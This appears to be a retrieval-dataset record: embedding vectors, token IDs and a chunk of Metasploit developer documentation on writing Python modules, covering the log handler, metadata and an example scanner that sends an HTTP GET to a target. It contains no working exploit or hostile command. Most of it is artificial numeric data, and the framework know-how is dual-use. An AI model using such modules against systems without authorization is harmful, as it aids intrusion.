1.3193020820617676, 0.5241037607192993, 0.1184801235795021, 0.5209215879440308, -0.33161088824272156, 0.7480199933052063, -0.0785803273320198, 0.5247013568878174, -0.5235617160797119, 0.7584601044654846, -0.3174586296081543, -0.7239571809768677, -0.9217022657394409, -0.17457804083824158, 0.1357966512441635, 0.14596141874790192, 0.4548793435096741, 0.21684232354164124, 0.43359485268592834, -0.6960525512695312, 0.09768230468034744, -0.5016165375709534, -0.025380320847034454, 0.1236463412642479, -0.15635384619235992, -0.7500765919685364, 1.414719581604004, -0.22108884155750275, 0.6727666258811951, 0.2002142071723938, 1.0709056854248047, 0.10111590474843979, 0.35542210936546326, -0.505608081817627, -0.2968760132789612, -0.3009794354438782, 0.5641846060752869, -0.0712808147072792, -0.19234901666641235, 0.43392518162727356, 0.0182829387485981, 0.8197363018989563, -0.23409873247146606, -0.3343084752559662, -0.73707515001297, 0.09891144931316376, -0.5404191017150879, -0.5620584487915039, 0.45051148533821106, 0.14903545379638672, -0.8527652025222778, 0.17789064347743988, 0.26175934076309204, 0.06136983633041382, 0.7653424739837646, 0.24695728719234467, -0.9106531739234924, -0.7177248597145081, -0.7271548509597778, 0.10853981226682663, 0.23041291534900665, -0.2103370726108551, 0.1522204726934433, 0.4397764503955841, -1.000502347946167, -0.43814584612846375, 0.36572179198265076, -0.8612358570098877, -0.24045832455158234, 0.8518784046173096, 0.31385838985443115, 0.8074829578399658, 0.20828258991241455, -0.10413596034049988, -0.7052643895149231, 0.404737263917923, 0.48257961869239807, 0.22062207758426666, 0.18385429680347443, 0.47931718826293945, -0.04821813479065895, 0.2508283257484436, -0.6704758405685425, 0.6225171089172363, 0.4219192862510681, -0.587721049785614, -0.03918444737792015, -0.20398686826229095, -0.8688949942588806, -0.45995357632637024, 0.25156256556510925, 0.2665478587150574, 0.06785012781620026, 0.2599538564682007, -0.8662651777267456, 0.0731598287820816, -0.4207472503185272, -0.1881076991558075, -0.15518563985824585, 0.1757635474205017, -0.0009162297355942428, -0.40384504199028015, -0.09685575217008591, -1.2437405586242676, 4.254141807556152, 0.4627147316932678, 0.5158324837684631, 0.4535936117172241, -0.02590171806514263, 1.0185340642929077, 0.7519068121910095, -0.6403428316116333, 0.3403599262237549, -0.0709087997674942, 0.5949944853782654, -0.13830474019050598, 0.22662824392318726, 0.24446293711662292, 0.15951219201087952, 0.1818937361240387, -0.7419858574867249, 0.04297684505581856, -0.14754819869995117, -1.017906665802002, -1.0399090051651, 0.1565261036157608, -0.9466935396194458, 0.8352415561676025, -0.12306926399469376, 0.16149179637432098, 0.36600735783576965, -0.6210885643959045, 0.5304267406463623, -0.442291259765625, -0.673653781414032, -0.05478421598672867, 0.1519603729248047, 0.27838587760925293, -0.8696600198745728, -0.5983931422233582, -0.41946908831596375, -0.9242302775382996, -0.8140058517456055, -0.47585147619247437, 0.6712033152580261, -0.323612779378891, 0.5531018376350403, -0.4410172402858734, 0.4883615970611572, 0.7602440714836121, -0.9470705389976501, 0.7594770789146423, 0.9765058755874634, -1.0043834447860718, 0.8788090944290161, -0.1711423695087433, 0.7144874334335327, -0.3961767256259918, -0.7676827907562256, 0.8869566321372986, 0.26121631264686584, -0.7853615880012512, -0.3462042510509491, 0.24816587567329407, 0.3399420976638794, -0.5878643989562988, 0.22088021039962769, 0.10964909940958023, -0.8899378776550293, 0.6658015251159668, -0.19812917709350586, 0.6117349863052368, 0.1124192550778389, 0.2897610068321228, -0.3734321892261505, 0.13454090058803558, -0.5866974592208862, -0.7866947054862976, 0.6361767649650574, -0.16769786179065704, 0.24752895534038544, -0.08601059019565582, 0.21602162718772888, -0.4538472294807434, -0.25069963932037354, -0.7013821005821228, -0.5394618511199951, 0.42814773321151733, 0.6933501362800598, 0.27377691864967346, -0.21190761029720306, -1.0308650732040405, 0.0942995622754097, 0.1726614534854889, 0.5053030848503113, 0.552666962146759, -0.10392576456069946, 0.2936083674430847, 0.11736737936735153 ]
[ 1010, 1005, 12398, 1005, 1024, 3904, 1065, 1010, 1005, 1026, 2171, 1028, 1005, 1024, 1063, 1005, 2828, 1005, 1024, 1005, 5164, 1005, 1010, 1005, 6412, 1005, 1024, 1005, 1026, 6412, 1028, 1005, 1010, 1005, 3223, 1005, 1024, 1026, 2995, 1013, 6270, 1028, 1010, 1005, 12398, 1005, 1024, 3904, 1065, 1065, 1065, 11336, 2828, 3022, 3491, 1999, 1996, 27425, 23561, 2592, 1010, 1037, 2828, 2003, 2036, 2421, 2005, 1996, 11336, 1012, 1996, 11336, 2828, 2003, 2109, 2000, 7276, 2019, 9413, 2497, 23561, 1010, 2029, 19421, 1037, 10090, 6254, 2005, 1996, 11336, 1012, 1996, 9413, 2497, 23561, 2015, 2064, 2022, 2179, 2182, 1012, 1996, 2206, 23561, 2015, 2024, 2747, 2800, 1024, 6556, 1035, 18077, 1035, 4642, 2094, 1035, 2754, 2099, 5425, 1035, 8241, 9998, 2309, 1035, 26221, 4800, 1035, 26221, 1996, 6556, 1035, 18077, 1035, 4642, 2094, 1035, 2754, 2099, 11336, 2828, 2003, 2109, 2043, 3015, 2019, 18077, 2005, 3094, 7781, 2030, 3642, 13341, 24728, 19666, 6906, 14680, 1998, 3640, 1996, 3094, 2000, 1999, 20614, 2046, 1996, 8211, 3642, 2241, 2006, 1996, 14894, 9675, 2005, 1996, 3094, 2754, 2099, 1012, 1996, 5425, 1035, 8241, 11336, 2828, 2003, 2109, 2043, 1037, 11336, 2003, 2881, 2000, 26633, 1037, 2326, 2000, 5425, 22496, 2005, 7176, 7846, 1012, 1996, 9998, 11336, 2828, 2003, 2109, 2043, 1996, 11336, 2097, 4604, 23730, 2000, 1037, 6556, 2326, 2008, 2097, 5823, 1996, 2326, 2030, 2404, 2009, 1999, 2019, 4895, 10383, 3468, 2110, 1012, 1996, 2309, 1035, 26221, 11336, 2828, 2003, 2109, 2043, 4526, 1037, 11336, 2000, 13594, 6184, 2302, 14108, 2075, 1012, 1996, 4800, 1035, 26221, 11336, 2828, 2003, 2109, 2005, 14184, 2008, 2024, 2183, 2000, 13594, 6184, 1999, 14108, 2229, 1012, 1996, 14108, 1035, 2946, 5724, 2003, 5068, 1999, 1996, 14163, 19646, 2072, 1035, 26221, 9413, 2497, 23561, 2007, 1037, 12398, 1997, 3263, 1012, 7047, 10760, 7047, 9206, 1999, 1996, 27425, 2024, 1996, 7047, 2008, 2097, 2022, 2800, 1999, 5796, 11329, 5644, 9890, 2043, 1996, 11336, 2003, 8209, 1012, 1996, 7047, 2064, 2022, 3223, 1006, 4072, 2005, 1996, 11336, 2000, 2448, 1007, 2030, 2025, 1006, 3073, 3176, 15380, 1007, 1012, 4807, 3406, 3413, 1996, 27425, 2592, 1010, 2004, 2092, 2004, 1996, 3225, 3853, 1997, 2115, 18750, 11336, 1010, 2000, 5796, 11329, 5644, 9890, 1010, 2224, 1996, 11336, 1012, 2448, 1006, 1007, 3853, 1012, 1996, 11336, 1012, 2448, 1006, 1007, 3853, 3138, 2048, 9918, 1010, 1996, 2034, 2003, 1996, 27425, 1998, 1996, 2117, 2003, 1996, 2655, 5963, 3853, 2000, 2224, 2043, 23448, 1996, 11336, 2013, 5796, 11329, 5644, 9890, 1012, 1996, 3642, 1055, 3490, 29519, 2097, 2298, 2066, 1996, 2206, 1024, 13366, 2448, 1006, 12098, 5620, 1007, 1024, 1001, 2115, 3642, 2182, 3413, 2065, 1035, 1035, 2171, 1035, 1035, 1027, 1027, 1005, 1035, 1035, 2364, 1035, 1035, 1005, 1024, 11336, 1012, 2448, 1006, 27425, 1010, 2448, 1007, 2043, 5796, 11329, 5644, 9890, 10255, 1037, 6235, 5227, 2000, 1996, 18750, 11336, 1010, 1996, 27425, 2592, 2003, 2513, 1012, 2043, 5796, 11329, 5644, 9890, 10255, 1037, 2448, 5227, 2000, 1996, 11336, 1010, 1996, 2655, 5963, 3853, 1010, 2448, 1999, 2023, 2742, 1010, 2097, 2022, 2170, 2007, 1996, 9918, 3024, 2000, 5796, 11329, 5644, 9890 ]
metasploit
121.txt
1
. a loghandler can be setup and used to communicate status information back to framework during execution of the python module. here is code snippet that uses the loghandler : import logging from metasploit import module module. loghandler. setup ( msg _ prefix ='logging test :') logging. info ('info') logging. error ('error') logging. warning ('warning') logging. debug ('debug') the module. loghandler. setup ( ) function is used the create a handler and formatter that will call module. log ( ) with the appropriate log level. full example #! / usr / bin / env python3 # - * - coding : utf - 8 - * - # standard modules import logging # extra modules dependencies _ missing = false try : import requests except importerror : dependencies _ missing = true from metasploit import module metadata = {'name':'python module example ','description':'''python communication with msfconsole.'' ','authors': ['jacob robles'],'date':'2018 - 03 - 22 ','license':'msf _ license ','references': [ {'type':'url ','ref':'https : / / blog. rapid7. com / 2017 / 12 / 28 / regifting - python - in - metasploit /'}, {'type':'aka ','ref':'coldstone'} ],'type':'single _ scanner ','options': {'targeturi': {'type':'string ','description':'the base path ','required': true,'default':'/'},'rhost': {'type':'address ','description':'target address ','required': true,'default': none } } } def run ( args ) : module. loghandler. setup ( msg _ prefix ='{ } - '. format ( args ['rhost'] ) ) if dependencies _ missing : logging. error ('module dependency ( requests ) is missing, cannot continue') return # your code here try : r = requests. get ('https : / / { }
[ 0.1948140412569046, -0.24009425938129425, -0.8070306181907654, 0.787487804889679, -0.3989277780056, 0.3889642059803009, -0.3461642563343048, 0.13705556094646454, 0.19407260417938232, 0.5222274661064148, 0.22334294021129608, -0.07412286847829819, 0.19516946375370026, -0.27454715967178345, -0.6072640419006348, -0.19985124468803406, -0.791202962398529, -0.7450041174888611, -1.1209455728530884, 0.3996049761772156, 0.4080122411251068, -0.06681741029024124, -0.5048609375953674, -1.1142010688781738, -0.9346093535423279, 0.4288788139820099, 0.34478530287742615, -0.13958489894866943, 0.9123337268829346, 0.609503448009491, -0.01640859991312027, -0.5110246539115906, 0.07628554850816727, -0.8909957408905029, 0.4703005254268646, -0.6382126212120056, 0.6308655738830566, -0.3585476279258728, -0.38053929805755615, -0.3738585114479065, 0.6764160990715027, 0.014827560633420944, 0.2760566473007202, -0.7681097984313965, -0.380294531583786, -0.5922088623046875, 0.2842409610748291, 0.187049001455307, 0.27659669518470764, 0.30960631370544434, 0.5059187412261963, 0.1029273197054863, 0.13258592784404755, 0.15270313620567322, -0.2950056195259094, -0.3745553493499756, -0.8086884617805481, -0.1822667270898819, -0.2528630793094635, 0.19087724387645721, 0.2812038064002991, -0.0500323586165905, 0.07359033823013306, -0.9203636050224304, 0.1833011656999588, 0.3434103727340698, 0.018460122868418694, -0.26702651381492615, -0.23993508517742157, -0.3244337737560272, 0.19480547308921814, 0.7652644515037537, -0.9181778430938721, -0.3790754973888397, -0.5210603475570679, 0.23764249682426453, 0.4110649526119232, -0.5831981301307678, -0.32172656059265137, 1.1571582555770874, 0.6062921285629272, 0.8526204228401184, -0.1760314702987671, -0.23422832787036896, -0.4627293348312378, -0.7826712131500244, 0.18438711762428284, 0.5685352683067322, -0.5431655645370483, 0.2908046841621399, -0.025068460032343864, 0.38149377703666687, -0.3830340802669525, 0.25744128227233887, 0.24379408359527588, 0.3592883348464966, -0.24180379509925842, 0.30032333731651306, -0.5765537619590759, -0.3258016109466553, 0.6777653098106384, 0.7858164310455322, 0.6749972105026245, 0.12090238928794861, 0.028044214472174644, 0.663013219833374, 0.41911017894744873, -0.608183741569519, -0.9219687581062317, -0.08473730832338333, 0.6967058181762695, -0.2715536057949066, -0.10705377161502838, -0.7673147916793823, -0.15851537883281708, 0.7738472819328308, 0.1957506537437439, -0.5039622187614441, -0.3470080494880676, 0.8289691209793091, 0.1701229065656662, 0.09087978303432465, 0.6998412013053894, -0.18715421855449677, 0.17643673717975616, -0.1732235848903656, 0.10284064710140228, 0.08272780478000641, -0.3702417314052582, -0.6384092569351196, -0.18065935373306274, -0.332827627658844, -0.4966125786304474, 0.8989768624305725, 0.27792707085609436, -0.0005718038883060217, 0.0685931146144867, 0.746453046798706, 0.7246875166893005, -0.5696587562561035, 0.33669209480285645, -0.047488633543252945, 0.1718447506427765, 1.3117363452911377, -0.0845964252948761, -0.3525526523590088, -0.6182145476341248, 0.5043737292289734, 0.05941237881779671, 0.5605630874633789, -0.013486959971487522, 0.5979002714157104, 0.1958818882703781, -0.43627044558525085, -0.5385891795158386, -0.15897388756275177, -0.16389508545398712, 0.40076613426208496, 0.32215994596481323, -0.10683434456586838, -0.35900962352752686, 0.4025006890296936, -0.470309317111969, 0.24909211695194244, -0.5068686604499817, 0.6351579427719116, -1.0542351007461548, -0.44227689504623413, -0.1974763125181198, 0.33925074338912964, 0.48930397629737854, -0.06345097720623016, 0.13263212144374847, 0.5273279547691345, 1.257509469985962, 0.2593512535095215, 0.3861934244632721, -0.7325285077095032, 0.5053836107254028, 0.5166940689086914, -0.2450307011604309, 0.2923268675804138, -0.06861545890569687, 0.8487092852592468, 0.43930625915527344, 0.1667148470878601, 0.4056467115879059, -0.25344663858413696, -0.547446072101593, -0.4645838737487793, 0.016975322738289833, 0.2687656879425049, -0.4234861135482788, 0.36560139060020447, 0.31529146432876587, 0.19077719748020172, -0.37239089608192444, -0.1921723484992981, -0.34991157054901123, -0.8462803959846497, -0.0779876857995987, 0.6979206204414368, -0.4988393485546112, 0.3948228061199188, -0.35714036226272583, -0.2799912095069885, 1.0663543939590454, 0.4315558671951294, -0.26896238327026367, 0.573379397392273, 0.6781179308891296, -0.026440490037202835, -1.0185970067977905, -0.2173195779323578, -0.07321016490459442, -0.4184686541557312, 0.08335993438959122, 0.3440450131893158, -0.5556623935699463, 0.3492795526981354, -0.10552730411291122, 0.4402090013027191, 0.685883641242981, 0.17954806983470917, 0.07528183609247208, -0.673087477684021, -0.3766269385814667, 0.13776250183582306, -0.08341451734304428, -0.0021629719994962215, 0.17395208775997162, 0.3919992744922638, 0.7863672971725464, 0.9716111421585083, 0.047493044286966324, -0.3036412000656128, 0.34497588872909546, 0.3617326617240906, 0.2867986857891083, -0.18542882800102234, -0.13020110130310059, 0.48433664441108704, 0.4040077328681946, 0.36800333857536316, 0.3257882595062256, -0.03961387276649475, -0.2577478885650635, -0.2618078887462616, -0.48375070095062256, 0.4356171488761902, -0.8477463126182556, 0.8629701137542725, 0.6085308194160461, 0.1620175689458847, -0.20421560108661652, -0.2198808193206787, 0.6635625958442688, 0.22608770430088043, -0.06874929368495941, -0.4071420729160309, 0.29888367652893066, 0.10076858848333359, -0.4709419012069702, -0.4202510714530945, 0.100508913397789, 0.615001916885376, -0.1953459084033966, -0.03333475440740585, -0.054777298122644424, -0.7339273691177368, -0.6007871627807617, 0.06339320540428162, -0.5053985118865967, -0.4471025764942169, -0.5771555304527283, 0.1677147001028061, 0.5448042154312134, -0.16004543006420135, 0.24745221436023712, 0.042514264583587646, -0.5479919910430908, 0.2602657973766327, -0.22248812019824982, 0.3250371217727661, 0.045558828860521317, 0.1513533890247345, -1.0103240013122559, -0.16894911229610443, -0.49626097083091736, 0.43073850870132446, -0.4005550444126129, -0.551583468914032, -0.3487776219844818, 0.006513172760605812, 0.2502005398273468, 0.5641244649887085, 0.4768609404563904, -0.20588935911655426, -0.18416287004947662, -0.06416206806898117, 0.3207649290561676, 0.038719043135643005, 0.6820356249809265, -0.2335614413022995, -0.7917459607124329, 0.18321840465068817, -0.0004407005035318434, 0.07927849888801575, 0.7909059524536133, 0.7439606189727783, -0.7629863619804382, 0.23738481104373932, -0.11392346769571304, -0.0362178310751915, -0.9307743906974792, 0.3116689622402191, 0.38325831294059753, -0.37916702032089233, -0.17544154822826385, -0.28180766105651855, -0.22354692220687866, 0.11653988063335419, -0.29116106033325195, -0.12978002429008484, -0.04023703187704086, 0.37570440769195557, -0.1577630490064621, -0.49087321758270264, 0.31108376383781433, -0.2909127175807953, -0.21085648238658905, -0.11858741194009781, -0.11432795971632004, 0.2141111195087433, 0.3975847363471985, 0.5252477526664734, -0.47477054595947266, -0.44694048166275024, -0.049238190054893494, 0.527594268321991, -0.012508404441177845, -0.4491303265094757, 0.42488276958465576, 0.6312033534049988, 0.02009318582713604, 0.5497106909751892, 0.7933739423751831, -0.23589377105236053, -0.04487622156739235, 0.3319561183452606, -0.19204403460025787, 0.04674289748072624, 0.33516252040863037, 0.44828060269355774, 0.20566391944885254, 1.0233443975448608, -0.4158715605735779, -0.06531015038490295, 0.465285986661911, 0.24050328135490417, 0.1896337866783142, 0.08392185717821121, 0.3058472275733948, -0.17027530074119568, -0.763197660446167, -0.6154032945632935, -0.15423908829689026, 0.2380915880203247, 0.5581614971160889, 0.04419761151075363, 0.8360823392868042, -0.3776189684867859, -0.27291032671928406, 0.08783069252967834, -0.43051132559776306, -0.20317940413951874, 0.30689504742622375, 0.5977053046226501, 0.7597012519836426, -0.3260529637336731, 0.12020701169967651, 0.07589276880025864, 0.0021107103675603867, 0.2631726861000061, 0.20177596807479858, 0.0029646491166204214, -0.505354642868042, 0.05319216102361679, -0.03167679160833359, -0.5190322995185852, 0.4994919002056122, -0.315091073513031, 0.20224152505397797, 0.5018161535263062, -0.8668383359909058, -0.2590991258621216, 0.8074919581413269, 0.9672231078147888, 0.39004743099212646, 0.5370211601257324, 0.981874942779541, -0.03770134598016739, -0.4390878677368164, 0.48606374859809875, -0.09798232465982437, 0.3961581885814667, -0.8367565274238586, 0.24361224472522736, -0.482489675283432, 0.20179489254951477, -0.5204326510429382, -0.42850470542907715, -0.7957109808921814, 0.35993415117263794, 0.2237052321434021, -0.03123810887336731, -0.6495282649993896, 0.3388766348361969, 0.9621742367744446, 0.36644166707992554, -0.5580363273620605, -0.397845983505249, 0.24915991723537445, 0.301110178232193, 0.9056866765022278, -1.0341506004333496, 0.1293884813785553, -1.0436391830444336, -0.03151221200823784, 0.3591056764125824, 0.1550702452659607, -0.3806469738483429, -0.5704144835472107, 0.08048959076404572, -0.638504147529602, 0.569057822227478, 0.8737735152244568, -0.28873613476753235, 0.10154352337121964, -0.9525012969970703, -0.11931139975786209, 0.228753924369812, -0.6281802654266357, -1.2201305627822876, 0.06201539933681488, 0.8580617308616638, 0.5884775519371033, 0.5261906981468201, -0.5653470754623413, -0.20868191123008728, 0.23437775671482086, -0.7630595564842224, -0.05421268567442894, -0.812899112701416, 0.4342586100101471, 0.2706030607223511, -0.3263337016105652, 0.059795137494802475, 0.4263867437839508, -0.1397934854030609, 0.07775508612394333, -0.14969635009765625, 0.16785112023353577, -0.21220923960208893, -0.5295904278755188, 0.6644781231880188, -0.10292579978704453, 0.19821445643901825, 0.42240822315216064, 0.6615296602249146, -0.455692857503891, -0.006266964133828878, 0.28997448086738586, 0.010230866260826588, -0.06053955480456352, -0.47955524921417236, 0.16835543513298035, -0.14209850132465363, -0.6224386692047119, 0.8960970640182495, -0.4846208095550537, 0.7484269142150879, 0.5860546827316284, 0.031850606203079224, -0.9284957051277161, -0.979653537273407, -0.14349204301834106, 0.6442618370056152, -0.15515533089637756, 0.08433003723621368, 0.02736642025411129, 0.0025544248055666685, -0.3987654447555542, 0.06808969378471375, -0.9583761692047119, -0.746873140335083, -0.2273990362882614, -0.43755194544792175, 0.3480401039123535, 0.7896066308021545, 0.43594878911972046, -0.15988506376743317, -1.0130367279052734, 0.9118078947067261, -0.3797496557235718, -0.24631065130233765, -0.7436414957046509, 0.13988041877746582, -0.9563986659049988, -0.09313125163316727, -0.3514869511127472, 0.5681724548339844, 0.03736571595072746, -0.10866815596818924, 0.0485648512840271, 0.6815391778945923, 0.13790719211101532, 0.23221421241760254, -0.4188025891780853, 0.17119143903255463, 0.40376970171928406, -0.8350707292556763, -0.20263317227363586, 0.5059453248977661, -0.16984808444976807, -0.16610868275165558, -0.6304805278778076, -0.4199676215648651, -0.9315952658653259, -0.2300131469964981, 0.41749462485313416, -0.034866731613874435, 0.41247546672821045, -0.9763816595077515, -0.283611923456192, 0.16397982835769653, 0.2634080946445465, 0.46040332317352295, -1.040846586227417, -0.5039759278297424, -0.2865157723426819, 0.33312952518463135, 0.17392085492610931, -0.36613428592681885, -0.20763948559761047, 0.12504947185516357, -0.7357847690582275, 0.958209753036499, 0.8302221894264221, -0.49611103534698486, -0.5551502108573914, -0.28390514850616455, 0.7769110798835754, -0.250736802816391, -0.5365873575210571, -0.01887047477066517, -0.5385693311691284, 0.1360800862312317, 0.004734792280942202, 0.6532326936721802, 0.15193228423595428, 0.09478206187486649, -0.04784915968775749, -0.03385002911090851, -0.6161962747573853, -0.4548797905445099, -0.26348400115966797, 0.17657765746116638, 0.6410535573959351, -0.2070571780204773, -0.30272072553634644, -0.5087645649909973, 0.404511958360672, 0.8426833748817444, 0.22147512435913086, -0.16064566373825073, -0.3093429207801819, -0.7666333913803101, -0.6044977903366089, 0.27351510524749756, -0.41302669048309326, -0.3284688889980316, 0.13299696147441864, 0.3187815845012665, 1.1209520101547241, -0.5448716878890991, 0.732907772064209, 0.8046834468841553, -0.052605077624320984, 0.09409406036138535, -0.8375847935676575, 0.311588853597641, 0.08157899975776672, -0.33881622552871704, 0.3127877712249756, -0.20030660927295685, 0.15563975274562836, 0.3795135021209717, -0.19476500153541565, -0.5986340641975403, -0.4336914122104645, -0.4554263651371002, 0.5870927572250366, -0.43254023790359497, 0.28944000601768494, 0.3257395029067993, -0.21318623423576355, -0.7698819637298584, 0.5717726349830627, 0.8837403655052185, -0.37265342473983765, 0.5148066878318787, 0.093769870698452, 0.6665052175521851, -0.31714940071105957, 0.043636832386255264, 0.1273820996284485, -0.14966744184494019, 1.101298451423645, 0.1878960132598877, -0.7264472246170044, 0.8534676432609558, 0.6587516069412231, -0.2767750322818756, -0.26245519518852234, -0.7029094696044922, -0.0763663500547409, 0.3924970030784607, -0.928525984287262, -0.733356773853302, -0.38741353154182434, 0.34265249967575073, 0.18445128202438354, 0.5990046262741089, 0.25147584080696106, -0.2627022862434387, -0.2717839479446411, 0.2572772204875946, -1.4215487241744995, 0.4377501606941223, 0.22772271931171417, -0.8164984583854675, -0.26976996660232544, -0.6223922967910767, -0.14174175262451172, -0.008403947576880455, -0.22164227068424225, 1.556208610534668, -0.4982367753982544, 0.10645381361246109, 0.18316799402236938, -0.08485124260187149, 0.7878139615058899, 0.41102930903434753, 0.1718471646308899, 0.24385377764701843, -0.04414932802319527, -1.006954550743103, -0.22563892602920532, 0.12452010810375214, 0.31273162364959717, 0.028152242302894592, 0.16506056487560272, 0.10832604020833969, 0.11713631451129913, 0.11846333742141724, 0.20933739840984344, -1.1740539073944092, -0.6025890707969666, -0.4892610013484955, -0.15681004524230957, -0.10847314447164536, 0.31293103098869324, 0.11166376620531082, -0.0006452579400502145, -0.3701614439487457, -0.5936991572380066, -0.012500135228037834, 0.30244866013526917, -0.11742652952671051, 0.18366429209709167, -0.18420973420143127, -0.048725806176662445, -0.7774493098258972, -1.1470504999160767, -0.7585655450820923, 0.10065092146396637, 0.875972330570221, -0.2303701639175415, -0.48387762904167175, -0.1190226748585701, -0.7649700045585632, 0.7602086663246155, -0.3445557951927185, 0.05562020465731621, -0.30143803358078003, -0.9133308529853821, 0.4155924916267395, 0.0887618288397789, -0.10001379996538162, -0.2802131772041321, 0.16320227086544037, -0.05126320570707321, 0.3914323151111603, -0.452662855386734, -0.22376076877117157, 0.13523048162460327, -0.0398256853222847, 0.5234572887420654, -0.15290847420692444, -0.056982770562171936, 0.015902172774076462, 0.32713738083839417, -0.3695930540561676, -0.4506756365299225, -0.15382961928844452, 0.1401119977235794, 0.30906274914741516, -0.09093828499317169, 0.4223240911960602, 0.7970224618911743, 0.535275936126709, 0.1510612666606903, -0.02318132482469082, 0.5508851408958435, 0.3484063744544983, 0.19307133555412292, -0.09855342656373978, -0.08127085119485855, 0.27471089363098145, -0.5212164521217346, 0.8857292532920837, 0.032967738807201385, -0.6349177360534668, 1.2291241884231567, -0.37129461765289307, 0.01863817498087883, -0.5779559016227722, -0.745276689529419, -0.22985318303108215, 0.5168232917785645, -0.12829814851284027, -0.2363428920507431, 0.07725895196199417, 0.21800988912582397, 0.18023666739463806, 0.23400859534740448, -1.1067500114440918, 0.18948674201965332, 0.3887414038181305, -0.23426592350006104, -0.3560010492801666, -0.9116038084030151, -0.3431437611579895, -0.13678601384162903, 0.1784559041261673, -0.034458909183740616, 0.5066654086112976, -0.26714831590652466, 0.02379235252737999, 1.1860448122024536, -0.5479560494422913, 0.4683254659175873, -0.04763975739479065, 1.3295331001281738, -1.0683722496032715, -0.8785388469696045, 0.37897220253944397, 1.5908459424972534, -0.2509682774543762, -0.252828985452652, -0.8837928771972656, -0.23954282701015472, -0.03687798231840134, 0.1532553732395172, -0.19278864562511444, -0.3848503828048706, -0.4309527277946472, -0.03809407725930214, -0.46579182147979736, 0.3741244375705719, -0.6410056352615356, -0.24021773040294647, 0.2117709517478943, -0.018591400235891342, -0.5581289529800415, 0.2866404950618744, -0.1280873715877533, -0.2932286262512207, 0.911275327205658, 0.12627148628234863, 0.4225514233112335, -0.44916149973869324, -0.025643767789006233, -0.48106229305267334, -0.41230157017707825, -0.08722150325775146, 0.5190256237983704, 0.13100366294384003, 0.7381243109703064, 0.13971221446990967, -0.48698124289512634, -0.653829038143158, 0.873684287071228, 0.690498948097229, -0.007779870182275772, -0.2610839009284973, -0.356807678937912, 0.11228375136852264, 0.06339176744222641, -0.09298482537269592, 0.8545857071876526, 0.45384880900382996, 0.04718071594834328, -0.6565287113189697, -0.33573538064956665, 0.6490654945373535, 0.2395765632390976, -0.1742994785308838, 0.017624232918024063, -0.5456686019897461, 0.5909484624862671, 0.3731537163257599, -0.732633650302887, 1.0455849170684814, 0.6684051752090454, 0.2050919085741043, -0.07052672654390335, 0.18533644080162048, -0.16222041845321655, 0.4486454427242279, -0.6015095114707947, -0.27987349033355713, -0.570693850517273, 0.046699218451976776, -0.5044199228286743, -0.8045065999031067, -0.5943295359611511, 0.14606314897537231, 0.6498201489448547, 0.038295865058898926, -0.2621229588985443, -0.08301272243261337, 0.17938433587551117, -0.8769091963768005, 0.5053528547286987, -0.7104901671409607, -0.20047970116138458, -0.11515935510396957, -0.23479337990283966, -0.7101954817771912, 1.1905429363250732, 0.06874431669712067, 1.039921522140503, 0.06312365084886551, 0.7672123908996582, -0.06948807090520859, 0.552294135093689, -0.015668725594878197, -0.33856266736984253, -0.9041248559951782, 0.21768023073673248, 0.03201822191476822, -0.6638444066047668, -0.18975648283958435, 0.16376993060112, 0.4376624822616577, -0.12934109568595886, -0.200763538479805, -0.8282192349433899, -0.05466838553547859, -0.1376495659351349, -0.9358465671539307, -0.07396217435598373, 0.26747027039527893, -0.603083074092865, -0.3698309063911438, 0.4073371887207031, 0.8222760558128357, 0.8024557828903198, -0.11896442621946335, -0.07672460377216339, -0.5953956246376038, -0.5099690556526184, -0.28678175806999207, 0.7762849926948547, -0.8778533339500427, -0.4417524039745331, 0.031927138566970825, -0.6926230788230896, -0.10811227560043335, -0.07485820353031158, -0.531989574432373, -0.37853091955184937, 0.5806902050971985, 0.6323350071907043, 0.8416774868965149, -0.07633933424949646, -0.2922804355621338, -0.8466954231262207, 0.6208896636962891, 0.5312123894691467, -0.1610187143087387, 0.894348680973053, 0.3600251376628876, -0.3110329508781433, 0.059963617473840714, -0.42165935039520264, 0.43107369542121887, 0.22649049758911133, -0.15494680404663086, 0.40323466062545776, -0.5738368630409241, -0.2196635603904724, -0.6476908326148987, 0.4770306646823883, -0.02227015793323517, 0.26955196261405945, 0.2896522581577301, -1.1788476705551147, -0.5049012303352356, -0.7737292647361755, 0.6304907202720642, 0.25945550203323364, 0.5306640863418579, 0.33226338028907776, 0.2048593908548355, 0.38339030742645264, -1.101584553718567, 4.368137836456299, 0.7795848250389099, 0.404630571603775, 0.2252548336982727, -0.034067552536726, 0.046223659068346024, 0.22154909372329712, -0.078733429312706, 0.18383724987506866, -0.5919440984725952, 0.29211997985839844, -0.5400018692016602, 0.21134722232818604, 0.6386777758598328, 0.17732955515384674, 0.7448292970657349, -0.9629530310630798, 0.6964835524559021, 0.08874090760946274, -0.6572856903076172, -0.9724225997924805, -0.02015930786728859, 0.030935464426875114, 0.794828474521637, 0.09600861370563507, 0.4670531451702118, 0.1259550154209137, -0.3630587160587311, 0.20149531960487366, -0.32305315136909485, 0.08805299550294876, -0.6973652243614197, 0.08950335532426834, -0.26730650663375854, -0.4274798035621643, 0.24608750641345978, -0.19787989556789398, -0.8911423087120056, -0.7261577844619751, 0.03509160503745079, 1.0572059154510498, -0.315890908241272, -0.10089300572872162, -0.6041419506072998, 0.2881809175014496, 0.8956699371337891, -0.5519506335258484, 0.4076597988605499, 0.9850817918777466, -1.0908055305480957, 0.7473682165145874, -0.5314422249794006, 0.7509183883666992, 0.16466405987739563, -0.8719115853309631, 0.5694946646690369, 0.2714577913284302, -0.7024696469306946, -0.7015982270240784, -0.267678827047348, 0.34138023853302, -0.5885409712791443, 0.6064661741256714, -0.1308649182319641, -0.559689462184906, 0.8369711637496948, -0.6587231755256653, 0.24276627600193024, -0.9392216205596924, -0.06373151391744614, -0.30047133564949036, -0.22710604965686798, -0.2188645452260971, -0.25627732276916504, 0.5363125801086426, 0.5720354914665222, -0.05079948157072067, 0.3487800657749176, 0.5789780616760254, -0.8830089569091797, 0.12155553698539734, -0.24063093960285187, -0.7886038422584534, 0.18143802881240845, 0.6368269920349121, 0.4667211174964905, -0.3456803560256958, -0.521953284740448, 0.5824180841445923, 0.053944967687129974, 0.583253026008606, 0.5336954593658447, -0.06551328301429749, 0.13625085353851318, 0.38600945472717285 ]
